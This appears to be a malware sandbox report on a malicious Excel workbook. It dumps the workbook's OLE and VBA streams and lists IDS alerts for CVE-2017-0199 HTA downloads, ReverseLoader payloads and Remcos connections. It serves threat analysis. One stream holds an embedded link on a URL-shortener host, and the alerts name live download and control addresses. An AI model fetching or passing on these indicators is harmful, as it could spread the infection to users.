                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/\x5DocumentSummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:248
                                                                                                                                                                                  Entropy:3.0523231150355867
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/\x5SummaryInformation
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:256
                                                                                                                                                                                  Entropy:4.086306928392587
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/Workbook
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                  Stream Size:134792
                                                                                                                                                                                  Entropy:7.974168320310173
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Stream Size:468
                                                                                                                                                                                  Entropy:5.269289820125323
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                                                                                                                                  Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:83
                                                                                                                                                                                  Entropy:3.0672749060249043
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                                                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:2486
                                                                                                                                                                                  Entropy:3.9244127831265385
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:536
                                                                                                                                                                                  Entropy:6.330646364694152
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                                                                                                                  Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD00726B69/\x1CompObj
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                  Entropy:4.219515110876372
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/MBD00726B69/Package
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Stream Size:26242
                                                                                                                                                                                  Entropy:7.635424485665502
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                  Stream Path: MBD001F7C6B/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6B/Workbook
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                  Stream Size:283872
                                                                                                                                                                                  Entropy:7.743278150467805
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                  Stream Path: MBD001F7C6C/\x1Ole, File Type: data, Stream Size: 936
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:MBD001F7C6C/\x1Ole
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:936
                                                                                                                                                                                  Entropy:5.16390902871293
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:. . . . A . . Z . . . . . . . . . . . . t . . . y . . . K . p . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . M . J . o . i . 1 . u . ? . & . h . o . s . i . e . r . y . = . i . m . m . i . n . e . n . t . & . b . a . s . k . e . t . b . a . l . l . = . i . n . n . a . t . e . & . g . r . e . e . c . e . = . b . r . a . s . h . & . b . o . a . r . d . = . w . e . e . & . p . a . c . e . m . a . k . e . r . . . _ . s $ r . ( . & D . < . . w w ( 0 . K . i
                                                                                                                                                                                  Data Raw:01 00 00 02 41 1e e5 1c b4 c8 ee 5a 00 00 00 00 00 00 00 00 00 00 00 00 74 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 70 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 6f 00 72 00 74 00 2e 00 72 00 75 00 6b 00 73 00 6b 00 2e 00 63 00 6f 00 6d 00 2f 00 4d 00 4a 00 6f 00 69 00 31 00 75 00 3f 00 26 00 68 00 6f 00 73 00 69 00 65 00 72 00 79 00 3d 00
                                                                                                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 291651
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:Workbook
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                  Stream Size:291651
                                                                                                                                                                                  Entropy:7.998399897768445
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . C . - Z . ' 5 | . m x - . 3 0 b 8 # ? ] . u 9 . = . . . . . . . . . . \\ . p . 2 U * 3 R i ' P c h . . & . 6 Y u I k * . c c j b ] . J N . F . . U { ^ 6 A ? J . . Q } > d ! . . o a Q 7 c U L B . . . ) a . . . b . . . = . . . e h . . . . p " . w " H k ^ . p o ( . . . % v . . . . R . . . . . . . . . = . . . . . . . . = . . . i A n / l @ . . . . . . . " . . . $ 6 . . . . ] $ . . . _ K . . . ( 1 . . . ) . < . # . M b d . 1 . . . D h Y Y . . @ . A v @ f $ ; J
                                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 43 04 2d 5a 86 7f a1 27 35 7c ff fe fb 00 8d 6d a6 78 2d b4 09 ce ff ba 82 d6 f1 33 30 b7 9c bc 62 b0 38 23 d1 3f 5d 1b 75 39 80 e9 a0 a6 d7 3d e1 00 02 00 b0 04 c1 00 02 00 a6 90 e2 00 00 00 5c 00 70 00 32 bf 93 f6 d6 55 2a ec b5 ef 33 52 fc 69 f9 a6 27 d8 50 fc 88 9c e4 63 68 06 08 26 a0 14
                                                                                                                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Stream Size:523
                                                                                                                                                                                  Entropy:5.257044322223331
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:I D = " { 9 9 6 B 1 C A 2 - 5 2 3 1 - 4 E 8 1 - A 6 5 5 - 8 A C 1 F 3 D 6 F 6 B A } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D D D F 3 7 1 2 C 9 E 9 C D E 9 C
                                                                                                                                                                                  Data Raw:49 44 3d 22 7b 39 39 36 42 31 43 41 32 2d 35 32 33 31 2d 34 45 38 31 2d 41 36 35 35 2d 38 41 43 31 46 33 44 36 46 36 42 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:104
                                                                                                                                                                                  Entropy:3.0488640812019017
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:2644
                                                                                                                                                                                  Entropy:3.9812271968824864
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:553
                                                                                                                                                                                  Entropy:6.356548309146614
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z b i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                                                                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 b9 7a 62 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-12-03T14:00:52.957814+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1142.93.65.16180192.168.2.2249177TCP
                                                                                                                                                                                  2024-12-03T14:00:52.957814+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1142.93.65.16180192.168.2.2249177TCP
                                                                                                                                                                                  2024-12-03T14:00:57.033411+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:00:57.033630+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1142.93.65.16180192.168.2.2249166TCP
                                                                                                                                                                                  2024-12-03T14:01:01.567076+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249168142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:01:01.567149+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1142.93.65.16180192.168.2.2249168TCP
                                                                                                                                                                                  2024-12-03T14:01:11.531099+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249169142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:01:23.117892+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249175142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:01:38.675522+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.65.137443192.168.2.2249176TCP
                                                                                                                                                                                  2024-12-03T14:01:39.948886+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.2249177142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:01:40.318974+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11142.93.65.16180192.168.2.2249177TCP
                                                                                                                                                                                  2024-12-03T14:01:40.318974+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21142.93.65.16180192.168.2.2249177TCP
                                                                                                                                                                                  2024-12-03T14:01:43.467133+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917831.13.224.724044TCP
                                                                                                                                                                                  2024-12-03T14:01:45.963112+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917931.13.224.724044TCP
                                                                                                                                                                                  2024-12-03T14:01:46.425588+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249180178.237.33.5080TCP
                                                                                                                                                                                  2024-12-03T14:01:53.979899+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.2249181142.93.65.16180TCP
                                                                                                                                                                                  2024-12-03T14:01:54.412303+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11142.93.65.16180192.168.2.2249181TCP
                                                                                                                                                                                  2024-12-03T14:01:54.412303+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21142.93.65.16180192.168.2.2249181TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 3, 2024 14:00:53.307441950 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:53.307503939 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:53.307591915 CET49165443192.168.2.2254.150.207.131
